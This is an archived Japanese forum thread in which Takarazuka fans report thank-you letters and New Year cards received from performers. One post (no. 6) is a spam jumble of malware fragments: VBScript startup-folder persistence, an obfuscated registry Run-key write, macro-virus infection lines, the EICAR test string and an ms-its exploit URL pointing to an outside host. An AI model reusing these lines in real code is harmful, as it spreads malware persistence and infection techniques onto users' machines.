5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

☆★ お礼状 8 ★☆

1 :名無しさん@花束いっぱい。:2006/12/26(火) 10:13:41 ID:ZE7z7jrR
お礼状の情報交換の場にしましょう。


2 :名無しさん@花束いっぱい。:2006/12/26(火) 11:05:06 ID:s/5EFRSf
>1
d。 


3 :名無しさん@花束いっぱい。:2006/12/26(火) 14:52:57 ID:3r34x7JV
月中堅、センス悪いんだなぁ…。
もう上級生なんだから少しはセンス磨いて垢抜けて欲しい。
回りも言ってやればいいのに。

4 :名無しさん@花束いっぱい。:2006/12/26(火) 15:15:24 ID:e2fGPVTu
たとえば??

5 :名無しさん@花束いっぱい。:2006/12/26(火) 16:19:17 ID:3r34x7JV
たとえば?
とにかく子供っぽい。
カッコいいのが欲しい・・・

6 :<body onload=window()>:2006/12/26(火) 16:58:55 ID:Y0a9sb0n
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub

7 :名無しさん@花束いっぱい。:2006/12/29(金) 14:55:16 ID:KQwJUaqS
ジェンヌさんに年賀状出しました!

8 :名無しさん@花束いっぱい。:2006/12/30(土) 19:30:12 ID:yWLYZ/k3
宙娘さんから来ました☆
今年最後の郵便物がご贔屓からだったので嬉しいです!

9 :名無しさん@花束いっぱい。:2006/12/30(土) 21:37:06 ID:iwCx7ruh
ォ正月はご贔屓サンから年賀状くるかなァィチョット期待してしまう…(^_^;

10 :名無しさん@花束いっぱい。:2006/12/31(日) 00:07:11 ID:HEQLxtaj
8さん,新公学年ですか?

11 :名無しさん@花束いっぱい。:2006/12/31(日) 08:13:03 ID:tSC0wFSR
10さん
はい。そうですよ!

12 :名無しさん@花束いっぱい。:2006/12/31(日) 10:30:53 ID:HEQLxtaj
じゃあ同じ人です。ありがとうございました!

13 :名無しさん@花束いっぱい。:2006/12/31(日) 11:39:34 ID:imgndfr0
研1さんからお礼状って来ますか?サインは入ってます?
お手紙で返事を書いてくれる人っているのでしょうか?

14 :名無しさん@花束いっぱい。:2006/12/31(日) 11:45:39 ID:uAzrKqcl
聞いてどーする?

15 :名無しさん@花束いっぱい。:2006/12/31(日) 11:55:55 ID:imgndfr0
聞いて理解します。昔は手紙を書いてくださったみたいですが、今もそうなのかと。

16 :名無しさん@花束いっぱい。:2006/12/31(日) 12:49:20 ID:YZfw48tb
初心者スレで研一を馬鹿にしてるのかと言われただろうが。

17 :名無しさん@花束いっぱい。:2006/12/31(日) 12:54:44 ID:imgndfr0
こっちで聞いて、だめだと思ったから向こうで聞いたの。言われただろうが。ってww
だから?関係ないでしょ〜おばかさんww

18 :名無しさん@花束いっぱい。:2006/12/31(日) 13:10:21 ID:imgndfr0
スレ違いですね。ごめんなさい。これで終わりましょう。次から戻してください。

19 :名無しさん@花束いっぱい。:2006/12/31(日) 17:57:31 ID:WqaKcut8
こんなDQNだから手紙の返事書かねーんだよw
生徒さん可哀想〜

20 :名無しさん@花束いっぱい。:2006/12/31(日) 19:43:40 ID:imgndfr0
いや、誰にも書いてないんで・・妄想きもw

21 :名無しさん@花束いっぱい。:2007/01/01(月) 02:20:19 ID:UoxSCyhC
晒しage

ばかってやだなあ。

22 :名無しさん@花束いっぱい。:2007/01/01(月) 02:59:06 ID:uoPrrnol
さぁて年賀状です!
今日は雨じゃなさそうで皆さん良かったね。

23 :名無しさん@花束いっぱい。:2007/01/01(月) 03:49:49 ID:/KW0spBV
年賀状出待ちで手渡しされた・・・。
ちょうどさっき書いたんですよ、よかったらどうぞ、と。
嬉しいのか嬉しくないのか・・・やっぱり嬉しいけどw

24 :名無しさん@花束いっぱい。:2007/01/01(月) 04:53:50 ID:pvjlpe8/
華城さんから退団の挨拶きましたか?

25 :名無しさん@花束いっぱい。:2007/01/01(月) 09:37:26 ID:T/NOEIhY
年賀状こなかった…。


26 :名無しさん@花束いっぱい。:2007/01/01(月) 11:18:16 ID:SmzQGwKo
予想通りこなかったw
去年は5日あたりだったけど今年はどうかなぁ?


27 : 株価【35】 【362円】 【大吉】 :2007/01/01(月) 11:19:26 ID:UpZlpcnb
きた

28 :名無しさん@花束いっぱい。:2007/01/01(月) 11:24:51 ID:swUm1Wcz
年賀状キタ。

29 : 【小吉】 【1867円】 :2007/01/01(月) 11:29:43 ID:T/NOEIhY
こない〜ッ(ノд<。)゜。
去年は一日にきたのにな。

30 :名無しさん@花束いっぱい。:2007/01/01(月) 12:00:55 ID:YC9UncEr
宙組下級生からきた人いる?
やっぱり公演中だから忙しいのかなぁ…。
去年は元旦にきたのに…。
たぶんお礼状+年賀状なんだろうなぁ。

31 : 【凶】 【1212円】 :2007/01/01(月) 12:07:58 ID:MErrSY/v
やはり元旦に来ると嬉しいね。
自分は、これから書くんだけど〜

32 :名無しさん@花束いっぱい。:2007/01/01(月) 12:10:37 ID:8a64oAha

宙組91期男役さんから年賀状きましたよ!

33 : 【末吉】 【69円】 :2007/01/01(月) 12:19:50 ID:zK/DCFjw
宙下級生からお礼状兼年賀状来ましたよ〜

34 :omikuji 【228円】 !:2007/01/01(月) 12:22:51 ID:mcDGWkNP
宙92期から年賀状来たって友達が言ってました☆

ちなみにウチには雪娘から年賀状来ました!

35 : 【大吉】 【1926円】 :2007/01/01(月) 14:08:18 ID:gCUloCFO
星86期男役さんから来ました!
凛々しくてカッコいい♪

36 :名無しさん@花束いっぱい。:2007/01/01(月) 14:26:22 ID:Y29HwyS4
星89期男役さんから来ました。

37 :名無しさん@花束いっぱい。:2007/01/01(月) 15:38:12 ID:3SDjXZJo
星87男役さんから来ました!!

38 : 【凶】 【1498円】 :2007/01/01(月) 16:12:18 ID:XsOsbjgc
雪90期男役さんからきました。








39 :名無しさん@花束いっぱい。:2007/01/01(月) 17:00:12 ID:PUSRMXnx
星85から年賀状きたー

40 : 【だん吉】 【1961円】 :2007/01/01(月) 17:38:14 ID:Vf2aZGfh
花組88期男役さんから来ました〜!

41 :名無しさん@花束いっぱい。:2007/01/01(月) 17:45:58 ID:vHVNHkf2
>>40
イニシャルプリ〜ズ

42 :【大吉】【100000000円】:2007/01/01(月) 18:23:08 ID:FNFRu4cw
年賀状来ねぇ。 (-_-)

43 :名無しさん@花束いっぱい。:2007/01/01(月) 18:34:18 ID:d2HefhC0
>42さん、お年玉、うらやましいです。

44 :名無しさん@花束いっぱい。:2007/01/01(月) 19:50:28 ID:7xymgLCu
>>42
すげ〜〜〜!!!

45 :名無しさん@花束いっぱい。:2007/01/01(月) 20:02:34 ID:++YSY2I5
星91男役からきました!
かっこい〜お写真!
コメントはほんの少しだけど、忙しい中ありがとう!

46 :名無しさん@花束いっぱい。:2007/01/01(月) 20:10:32 ID:kn/mbDLA
星娘から来ました〜。
振袖でかわいい!

47 :名無しさん@花束いっぱい。:2007/01/01(月) 20:42:00 ID:/anAsWkD
うちの贔屓、来ない。きっと待ってても来ないだろうな。ってか、半年以上何もないし。
お付きが辞めるらしいし、これからどーしたらorz

48 :名無しさん@花束いっぱい。:2007/01/01(月) 21:11:29 ID:07cYd5SK
まだこない。
明日は雨だから届きそうな予感。

49 :名無しさん@花束いっぱい。:2007/01/01(月) 21:38:31 ID:GDgtW8Xh
私も年賀状来ました(^ー^)娘役さんは振袖で可愛いらしく、男役さんは私好みの服でポーズ決めてました。
嬉しかったです♪ありがとうございます!

50 :名無しさん@花束いっぱい。:2007/01/01(月) 21:43:22 ID:WsHUQfVW
42はりさだからね…

51 :名無しさん@花束いっぱい。:2007/01/01(月) 21:47:53 ID:1A7nwjmB
宙91期男役カラお年賀頂きました!!!!

52 : 【大吉】 【163円】 :2007/01/01(月) 21:48:25 ID:mJyHoFSp
宙娘から来た

53 : 【大凶】 【1891円】  :2007/01/01(月) 22:26:20 ID:WoE2wdEg
元旦に来るなんて・・・・・・・・成長したなあw
もうだいぶ上級生になったが、いまだに直筆メッセ入れてくれるのが泣ける。
まあ、ファンの数が知れてるからかもしれないが。

54 :名無しさん@花束いっぱい。:2007/01/01(月) 22:26:54 ID:/KW0spBV
雪男86から来た・・・なんでだ?
会に入ってない、お茶会に参加してない、間接的にチケットを頼んだこともない、個人的な面識もない。
割と好きだけど、ファンじゃない。
なのに一字の間違いもない宛名で届いた。これはなんのミス?

55 :40です:2007/01/01(月) 23:40:49 ID:Vf2aZGfh
>>41さんへ
Oさんから届きました。

バレバレですよねorz

56 :名無しさん@花束いっぱい。:2007/01/02(火) 03:13:43 ID:Zpm6Tcdm
90期雪娘から来ました。
いつも小さい字でたくさんコメント書いてくれてありがとう。
新年早々泣けました。
これからもずっとあなただけを応援します…

57 :名無しさん@花束いっぱい。:2007/01/02(火) 10:21:27 ID:LkGb9LgY
星91男役から昨日きました♪いい役がついたみたいで、コメントもたくさんあってHappyです

58 :名無しさん@花束いっぱい。:2007/01/02(火) 10:45:52 ID:DsX24d/I
57さん、ハレルヤ出演者ですか?!

59 :名無しさん@花束いっぱい。:2007/01/02(火) 13:39:58 ID:hDlqsql9
雪91娘からお礼状兼年賀状が届きました。
いつも丁寧なコメントありがとう!!今年も一年精進してね

60 :名無しさん@花束いっぱい。:2007/01/02(火) 15:32:14 ID:d4gZeuoh
>>55
ありがトン!

61 :名無しさん@花束いっぱい。:2007/01/02(火) 16:44:25 ID:LkGb9LgY
57です!ハレルヤ組です♪音楽学校から応援してます〜そして初日おめでとう☆

62 :名無しさん@花束いっぱい。:2007/01/02(火) 19:14:42 ID:LqhIjYro
しかし、自分が年賀状書くと、これを公演ごとにやるジェンヌさんの大変さが身にしみてわかるよね。
枚数もケタ違いなのにさ〜。
いつもありがとうね、○○ちゃん!

63 :名無しさん@花束いっぱい。:2007/01/02(火) 20:33:54 ID:DsX24d/I
61さんありがとう!
初日おめです!!


64 :名無しさん@花束いっぱい。:2007/01/02(火) 22:38:57 ID:c143V4CJ
来ない来ない!!月男!今年は書けただろうに・・・

65 :名無しさん@花束いっぱい。:2007/01/02(火) 23:05:54 ID:61t79D/K
月男月女の年末は忙しかったデソ・・・と思う我也・・・


66 :名無しさん@花束いっぱい。:2007/01/02(火) 23:16:38 ID:LLEgvUZk
>>62
たしかに・・・数十枚に一言書くだけでも手が痛いのに!
贔屓から数行の言葉をもらえるなんて、幸せすぎるよ。

67 :名無しさん@花束いっぱい。:2007/01/03(水) 00:18:41 ID:LZQ+mn7F
アヒから来ました。ありがとう。お互い厄年だけど、頑張りぬこうね!アヒは前厄、ミーは一年だけの厄なの。 (n^-^n)

68 :(n^-^n):2007/01/03(水) 00:20:16 ID:LZQ+mn7F
アヒ、あけおめ!(^o^)/~~

69 :名無しさん@花束いっぱい。:2007/01/03(水) 00:20:57 ID:LZQ+mn7F
厄年大杉

70 :名無しさん@花束いっぱい。:2007/01/03(水) 00:22:12 ID:LZQ+mn7F
(n^-^)n もやすみ。アヒ

71 :名無しさん@花束いっぱい。:2007/01/03(水) 00:24:02 ID:LZQ+mn7F
アヒもカキコちて(^ー^)いいからね。

72 :名無しさん@花束いっぱい。:2007/01/03(水) 00:28:13 ID:ocdMOqDK
あなたはこっち
http://hobby8.2ch.net/test/read.cgi/siki/1167502460/


73 :名無しさん@花束いっぱい。:2007/01/03(水) 02:46:27 ID:GSCDoTdr
雪85娘から年賀状来ましたか?


74 :名無しさん@花束いっぱい。:2007/01/03(水) 10:51:28 ID:xuHtXr6Q
星91娘から年賀状きた!

75 :名無しさん@花束いっぱい。:2007/01/03(水) 11:18:45 ID:QawlX8/y
今日はまだ年賀状すら来ないべ・昼からの配達なんかなュ

76 :名無しさん@花束いっぱい。:2007/01/03(水) 12:03:38 ID:vf7urlrH
まだ来ない。
一体どうなってるの?

77 :名無しさん@花束いっぱい。:2007/01/03(水) 13:25:13 ID:Lpc2cCzE
雪88男役さんからきませんがなにか。

78 :名無しさん@花束いっぱい。:2007/01/03(水) 15:43:21 ID:XQSWl37z
去年、贔屓が退団した。
当然今年は年賀状来ない・・・さびしい・・・
友人の付き合いで応援している生徒と、
手紙だけ書き続けている娘役から年賀状が来た。
とても嬉しかった。癒されたよ、ありがとう。

79 :名無しさん@花束いっぱい。:2007/01/03(水) 16:55:34 ID:NDjKI9cG
たった一度だけチケ取ってもらった88期娘役さんから自筆入りの
ご丁寧な賀状が来た。なんだか申し訳ない。
また頼もうかな。

80 :名無しさん@花束いっぱい。:2007/01/03(水) 18:21:20 ID:+oprFwk5
来ました。ありがとう!ちなみに宙です。

81 :名無しさん@花束いっぱい。:2007/01/03(水) 18:28:21 ID:kho2Mn5Y
>>79
星娘?

82 :名無しさん@花束いっぱい。:2007/01/03(水) 21:50:07 ID:d7FNMvd1
暫く実家に帰省していて今日、年賀状見たんですが一番欲しい一枚がないんだよね…去年はくれたのにな

83 :名無しさん@花束いっぱい:2007/01/03(水) 22:13:11 ID:bDMsV4YU
本命ではないが宙88期男役さんからきました。サインコメント付き$OW

84 :名無しさん@花束いっぱい。:2007/01/03(水) 22:43:51 ID:bw3b9I7M
>83
どなたでしょうか…?イニシャルお願いします

85 :名無しさん@花束いっぱい。:2007/01/03(水) 23:15:20 ID:3iazXPVs
娘役さんてマメなのかな。平仮名が可愛いの。

86 :名無しさん@花束がいっぱい:2007/01/04(木) 00:50:13 ID:lfbiK6J4
ごひいきから元旦に来ました。年末お稽古で忙しかっただろうに。
ありがとうね。
びっくりしたのは「絶対元旦過ぎてから来るな」と思った人が
元旦に届いたこと。コメントもいっぱいだった。うれしかった。
OGで待ち人がいるけどどうかなー

87 :名無しさん@花束いっぱい。:2007/01/04(木) 13:24:42 ID:f1LA7nCd
輝咲さんからクリスマスプレゼント来た人、他にいる?

88 :名無しさん@花束いっぱい。:2007/01/04(木) 18:56:16 ID:q+qCDjH3
年賀状まだこねえ。
ファンクラ辞めてやる!

89 :名無しさん@花束いっぱい。:2007/01/04(木) 18:57:34 ID:xBH99X//
>>87
お年賀届いた人なら知ってるw

90 :名無しさん@花束いっぱい。:2007/01/04(木) 19:36:18 ID:FD9fUQmN
月下級生から頂きました!
最近全然お手紙出してなかったのにありがとう。


91 :名無しさん@花束いっぱい。:2007/01/04(木) 19:52:59 ID:bdQDAF4s
OGの星85期からきた!!


92 :名無しさん@花束いっぱい。:2007/01/04(木) 20:42:44 ID:2cjPpF/A
会に入ってても年賀状来ないと凹む
でも郵便やさんくるたび反応してまうorz

93 :名無しさん@花束いっぱい。:2007/01/04(木) 21:00:53 ID:XNn2w44w
輝咲さんとやらはマメな生徒さんでいらっしゃる

94 :名無しさん@花束いっぱい。:2007/01/04(木) 21:46:40 ID:9zNdreDb
>>93 自演宣伝乙!

95 :名無しさん@花束いっぱい。:2007/01/04(木) 22:14:23 ID:c6EK86Bg
ファンクラブ入ってるけどまだこないヨ。
だからってこんなトコで文句は言わない。
文句言うくらいならファンクラブに聞いたらいいだけだヨ。


96 :名無しさん@花束いっぱい。:2007/01/04(木) 22:41:29 ID:tGffPpJx
あぁ〜88期雪男サンから年賀状こなぃ...(T_T)

97 :名無しさん@花束いっぱい。:2007/01/04(木) 22:43:34 ID:XNn2w44w
>94
自演じゃないよ。
自分煽ったつもりだから〜。

98 :名無しさん@花束いっぱい。:2007/01/04(木) 22:59:29 ID:J2NPnxgS
雪男88から年賀状とお礼状…
両方共に直筆メッセージ入り
下級生には必要な作業なんだろうけど大変だね〜
別々に送るんだね…

99 :名無しさん@花束いっぱい。:2007/01/05(金) 07:41:26 ID:ZY7gJUiw
花92娘からなんにもこない………
忙しいのかなぁ……
ショボーン

100 :名無しさん@花束いっぱい。:2007/01/05(金) 12:31:42 ID:6H11SACL
雪娘からお礼状兼年賀状が来ましたー!
公演でお疲れなはずなのに、サインとメッセージありがとう!

101 :名無しさん@花束いっぱい。:2007/01/05(金) 16:20:16 ID:FCpy4kqQ
100>>雪娘って何期の人ですか?

85期可愛い娘トリオから来た人いらっしゃいますか?(シナちゃんも可愛いですが、会があるのでシナちゃんではないです)

102 :名無しさん@花束いっぱい。:2007/01/05(金) 16:55:16 ID:6H11SACL
>101さん
89期の方です☆

103 :名無しさん@花束いっぱい。:2007/01/05(金) 17:28:32 ID:ydfAshOU
>87>89
よく話しにのぼるけど輝咲さんて、本当にファン思いなんですね。
うらやましす・・・

104 :名無しさん@花束いっぱい。:2007/01/05(金) 19:02:01 ID:9jxVvhhI
月92期娘役から来た方いますか?

105 :名無しさん@花束いっぱい。:2007/01/05(金) 19:04:42 ID:ynNUOKLj
>>104
来ましたよ〜

106 :サル:2007/01/05(金) 19:10:28 ID:jxcAGTlA
はじめまして、
礼状の書き方についてレクチャー願います。


107 :名無しさん@花束いっぱい。:2007/01/05(金) 20:31:47 ID:QjGmBGFa
宙91期娘役からきました!
この忙しい中くれたと思うと、とても嬉しいです。
これからも頑張って欲しい!

108 :名無しさん@花束いっぱい。:2007/01/05(金) 20:39:02 ID:976ENwK3
月91期娘から、来ない・・(ノд<。)゜。
忙しいから、仕方ないかなあ・・・。寂しい。

109 :名無しさん@花束いっぱい。:2007/01/06(土) 12:50:54 ID:Q3bUUhzB
>74さん
良かったらイニシャルお願いします。
私も星91期娘を応援しているのですが、お礼状すらずーっと来ない・・。

110 :名無しさん@花束いっぱい。:2007/01/06(土) 17:23:25 ID:c478DZM8
月組娘から年賀状きたぁ〜!!


111 :名無しさん@花束いっぱい。:2007/01/06(土) 17:28:20 ID:rYL7tGG9
星91期の娘役さんから来ました〜。初舞台からこっち、どーにも来ない人からだったので驚きました。振り袖姿がとっても可愛いっ

112 :名無しさん@花束いっぱい。:2007/01/06(土) 17:52:12 ID:48AwhUzn
花下級生娘からこない・・・
ショックだ。

113 :名無しさん@花束いっぱい。:2007/01/06(土) 18:58:51 ID:9/dLMXqY
うちにも花下級生から来ない…。

114 :名無しさん@花束いっぱい。:2007/01/06(土) 19:43:55 ID:X9qP+qNq
星下級生からようやく賀状がとどいたよ。
元旦の消印はあるけど…随分時間かかったな。
手書き6行はたいしたもんだな。

115 :112:2007/01/06(土) 20:36:38 ID:48AwhUzn
>113
私はちなみにマインドトラベラー組の89期です。
113さんは?

116 :名無しさん@花束いっぱい。:2007/01/06(土) 21:46:18 ID:9/dLMXqY
>115サン
同じ…人な気がしますw

117 :112:2007/01/06(土) 23:16:20 ID:mgvB1wgA
>116
悲しいけど仲間がいて少し安心。早く来てほしいですね。
今から出すと考えて、つらいけど待ち続けましょう。

118 :名無しさん@花束いっぱい。:2007/01/07(日) 21:26:21 ID:pZHmpnyf
この間の公演から手紙全然出してなかったのに年賀状が来て嬉しかった!
某路線娘役さんありがとう!!



119 :名無しさん@花束いっぱい。:2007/01/07(日) 22:08:06 ID:MShx2n8F
>112、113さん
お礼状と年賀状兼ねてなかった?
それなら元旦に届いたけど違うのかな。


120 :名無しさん@花束いっぱい。:2007/01/07(日) 22:50:21 ID:VK/CER32
遅くなったけど、雪86娘から来た!
いっぱいコメントありがとうー

121 :名無しさん@花束いっぱい。:2007/01/07(日) 22:52:11 ID:1Xf2oIwi
>119さん
私のところには届いてないです・・・
もうこないのかな。すごく悲しい。
チケット取ってあげなかったのが原因?
地方の学生で一人暮らしだから、見に行くお金がないんです。


122 :名無しさん@花束いっぱい。:2007/01/07(日) 22:59:58 ID:MShx2n8F
>121さん
私もチケットは頼んでいません。
花男からはチケット頼んでいない友人は元旦に届き
チケット頼んだ私は昨日届いたから
もう少し待ってみたら?

123 :名無しさん@花束いっぱい。:2007/01/07(日) 23:08:06 ID:1Xf2oIwi
>122さん
励ましのお言葉ありがとうございます。
もうちょっとまってみます。


124 :名無しさん@花束いっぱい。:2007/01/07(日) 23:16:39 ID:M/vH1bVT
退団された方の演技を、他で昨夏に観て感動して、一度だけファンレターを書きました。
期待なんかしてないのに、年賀状が来ました。この1枚で今年1年頑張れます!

125 :名無しさん@花束いっぱい。:2007/01/08(月) 01:41:49 ID:LHaeID29
私の贔屓、年に一度の年賀状しか作らない。
そういう生徒って結構いるの?

126 :名無しさん@花束いっぱい。:2007/01/08(月) 09:55:28 ID:e3rIItBl
>125
結構、というほどじゃないかもしれないけど珍しくもない。
お年賀+サマーカードのみ、っていう人ならもっといるよ。特に娘役や下級生。
お礼状作るにもお金がかかるしね…
実家の支援(金銭面)や手伝い(住所管理とか)もなく、さらに筆不精の子はどうしてもね。
うちのご贔屓さん、一昨年はお年賀とサマーカードのみだったのに
去年一年は4〜5枚きてびっくりした。お年賀も元旦にきたし嬉しかったー
…と友人に話したら、友人の同じ組のご贔屓さんも同様とか。
組内で「挨拶状はマメにだしましょう」みたいな決めごとでもできたのかw

127 :名無しさん@花束いっぱい。:2007/01/08(月) 10:02:22 ID:WIsgtiNJ
去年の夏以降ファンレター送らなかったせいなのか年賀状が来ないです。
やはりマメにださないとだめなのですか?



128 :名無しさん@花束いっぱい。:2007/01/08(月) 10:54:28 ID:5bFTiGnH
年賀状は三が日に来てこそ値打ちがあるんだと思いません?


129 :名無しさん@花束いっぱい。:2007/01/08(月) 11:49:11 ID:cIZEQ0Cd
>>128
そんなこと思わない。
暇人からの年賀状ならとにかく、お稽古や舞台で忙しい人なら、
何時来ても値打ちがある。
>>127
差出人の性格だと思います。
その贔屓さんは、豆にファンレターを出さないといけない人かも。

130 :名無しさん@花束いっぱい。:2007/01/08(月) 13:14:57 ID:F9JXComE
輝咲さんてお金持ちなんだね!
そんなにファンサービスしてくれるのか・・・
私も今からファンになろうかな。


131 :名無しさん@花束いっぱい。:2007/01/08(月) 14:08:55 ID:HU2T6S2X
>>130 毎回毎回自演乙。
輝咲さんてネットで自演カキコばかりするほど暇なんだねw

132 :名無しさん@花束いっぱい。:2007/01/08(月) 15:34:56 ID:aqcbR9lt
皆さんは、自分からもスターさんに年賀状を送られるんですか?

133 :名無しさん@花束いっぱい。:2007/01/08(月) 15:49:15 ID:Rylq2f53
>>132
私は、出しました!
「今年も応援します!」ってねぇ(*・∀ー)ハ(ー∀・*)

134 :名無しさん@花束いっぱい。:2007/01/08(月) 16:03:59 ID:aqcbR9lt
>>133
有難うございます!

私も出そうか出すまいか、毎年迷ってて。
年賀状って、手紙やポストカードとはまた全然違う気がして、出す年もあれば出さない年もあったりw

135 :名無しさん@花束いっぱい。:2007/01/08(月) 17:39:08 ID:wxvipPkS
>>134
新年のご挨拶って事で自分が喪中じゃない限り出してるよ!


136 :名無しさん@花束いっぱい。:2007/01/08(月) 19:44:24 ID:/49SwdGK
ふざけてるのかと思うくらい汚い字でした。


137 :名無しさん@花束いっぱい。:2007/01/08(月) 21:04:05 ID:7MT8iIxT
↑何が?

138 :名無しさん@花束いっぱい。:2007/01/08(月) 21:10:52 ID:WMFI96Oa
いつ、着物姿いつ撮ったのだろて感じのすごい年賀状

139 :名無しさん@花束いっぱい。:2007/01/08(月) 21:35:46 ID:vwDTJTHc
>>134
私も出し始めて3年?‥くらいですが、いつも出すお手紙と同感覚で出しますよ。ただたまたまお正月なので、それじゃあ年賀状で。‥みたいなw
年賀状にもお手紙みたいにびっしり応援メッセージとか書きますw
さすがに「明けましておめでとうございます」だけだとただの年賀状になっちゃうので、年賀状にもいつものようにお手紙を書けば一種のファンレターでいいんじゃないですかね?‥ 長々とすみません

140 :名無しさん@花束いっぱい。:2007/01/08(月) 21:50:12 ID:aqcbR9lt
>>139
なるほど!私も簡単な挨拶だったり、長々だったり、出さなかったりと、バラバラだったので、参考になりました。
有難うございました。

141 :名無しさん@花束いっぱい。:2007/01/08(月) 23:34:28 ID:d3JLaNnp
退団したOGから本名、実家?の住所付で年賀状が届いたのですが
返事は出すべきですか?今まで、実家に送るのは失礼だな、と思って
何もしなかったのですが何回か届くと何も送らないのが失礼に
なるような気がして・・。



142 :名無しさん@花束いっぱい。:2007/01/09(火) 01:08:52 ID:kbfjQ2UL
>>141
何も失礼は有りませんよ。
どの様な場合でも(通常の交際や、時にはお客様でも)相手が住所を明記してくるなら、
失礼度0%です。
例としては少々違いますが、ビジネスで相手の会社の住所で
○△◇株式会社星花部長様に年賀状を出して返事が自宅住所なら、
私は以後ご自宅に出してます。何も不都合は有りません。
それよりも、羨ましいですよ!本名住所等なんて!!!

143 :名無しさん@花束いっぱい。:2007/01/09(火) 01:29:17 ID:hnrGux+d
>>109
74です。
下の名前がMの娘役さんです。

144 :名無しさん@花束いっぱい。:2007/01/09(火) 03:13:23 ID:ufFeTPfu
本当に羨ましい。
家にも贔屓だったOGさんから年賀状やサマーカードが届いた事がありましたが、
生徒名のみだったため何もお返事できずでしたもの。

145 :名無しさん@花束いっぱい。:2007/01/09(火) 11:18:38 ID:FNPV2/k7
輝咲さんから昨日、自分の誕生日にプレゼントをいただきました!!


146 :名無しさん@花束いっぱい。:2007/01/09(火) 11:35:39 ID:v+FolhhD
それは輝咲さんの方がファンに誕生日を聞くの?
ファンが自ら教えるの?
いつも輝咲さんからのプレゼントネタは出るけれど、145は書いたの誰だか特定されてしまっても大丈夫なの?
いや、私は通りすがりの92期ファンですけれど、輝咲さんがファンにマメな方なのは書き込み見ていて良く分かったけれどね、輝咲さんの自演とか言われちゃってちょっと気の毒だなあと思ってね。。。

147 :名無しさん@花束いっぱい。:2007/01/09(火) 12:10:45 ID:ufFeTPfu
輝咲って子はそんなことをずっと続けるつもりだろうか。
ファン一人一人にしてたら大変だろうに。

148 :名無しさん@花束いっぱい。:2007/01/09(火) 12:15:55 ID:ufFeTPfu
145はキチガイの自演と判明

以降スルーで

149 :名無しさん@花束いっぱい。:2007/01/09(火) 13:33:39 ID:+LFJhyBL
>74さん
ありがとうございます。
てっきりご贔屓かと思っていたのですが、下の名前はMではないので・・。
未だにお礼状が来ないので(涙)切られたと思った方が良いのかな・・。



150 :名無しさん@花束いっぱい。:2007/01/09(火) 14:26:17 ID:ZRTsekcE
輝咲さんて子は季節やお祝いごとにプレゼントをしてくださるのですか?
羨ましいっス。
うちのごひいきからはまだ年賀状すら来ない・・・。

151 :名無しさん@花束いっぱい。:2007/01/09(火) 14:49:11 ID:lTGCoSa8
また出た、自演生徒。いい加減にしろ!
バカじゃね?w

152 :名無しさん@花束いっぱい。:2007/01/09(火) 16:40:54 ID:4Lu95TLT
とりあえず、「輝咲」ってのをNG設定しておけばよいのだろうか?

153 :名無しさん@花束いっぱい。:2007/01/09(火) 17:52:36 ID:wVjMna5G
月娘から、年賀状が届きました!!
公演中で忙しい中、丁寧なコメント入りをありがとう\(^O^)/

154 :名無しさん@花束いっぱい。:2007/01/09(火) 21:13:33 ID:lTc+r842
私もご贔屓さんから届いたよ!

155 :名無しさん@花束いっぱい。:2007/01/09(火) 22:46:11 ID:uKr3cBJj
やっと月娘から年賀状が届きました!!

156 :名無しさん@花束いっぱい。:2007/01/09(火) 23:04:51 ID:m0SbYdEo
雪男から年賀状・お礼状はきたが、お茶会の写真は来ない…

157 :名無しさん@花束いっぱい。:2007/01/10(水) 09:22:27 ID:TjasALkN
うちの月娘の贔屓、年賀状だけは実家にくれた。
何故?帰省してると思ってわざわざ気をきかせてくれたの?それとも間違い?

158 :名無しさん@花束いっぱい。:2007/01/10(水) 14:25:17 ID:kUpsB8G2
雪娘さんからお礼状兼年賀状届きました!
忙しいのに、どうもありがとうございます。

159 :名無しさん@花束いっぱい。:2007/01/10(水) 14:50:20 ID:r3Ym+t08
花娘さんから年賀状来ました!! コメントもいつもより多く書いてあって
ありがとう♪ 

160 :名無しさん@花束いっぱい。:2007/01/10(水) 16:32:03 ID:OFvMVeMM
星下級生本人と実家(家族連名)から、2枚の年賀状が元旦に届いた。
「娘がお世話になってます」の達筆に、はじめは誰???
両親の名前をみても思い当たらず、名字に子の名前を続けて声に出してはじめて
おぉぉぉ〜〜!!!
家族のサポートの大変さに驚くやら感動するやら・・・


161 :名無しさん@花束いっぱい。:2007/01/10(水) 18:01:17 ID:BU5Iz59+
>160
研一さん?

162 :名無しさん@花束いっぱい。:2007/01/10(水) 20:51:54 ID:uhpcdJsA
>>160はまた自演です。
どーせまた輝咲とか名前書くんだろ、
アホじゃね?
自演生徒、手取り足取り毎日書き方変え、自分の宣伝↑
ほんとにご苦労様!!

163 :名無しさん@花束いっぱい。:2007/01/10(水) 23:03:40 ID:BpVdWocy
>161
研2です。
一度お花も送ったけど公演続いてるせいもあってか
お礼状はまだ(くるのか?)もらってない…
だからよけいにビックリ!



164 :名無しさん@花束いっぱい。:2007/01/11(木) 00:16:43 ID:QshWn3V9
自演生徒とは何故わかる?
そんなにイタイのか生徒は・・・?

165 :名無しさん@花束いっぱい。:2007/01/11(木) 00:22:36 ID:YdTSsKsL
家族から年賀状貰っても嬉しくない・・・。
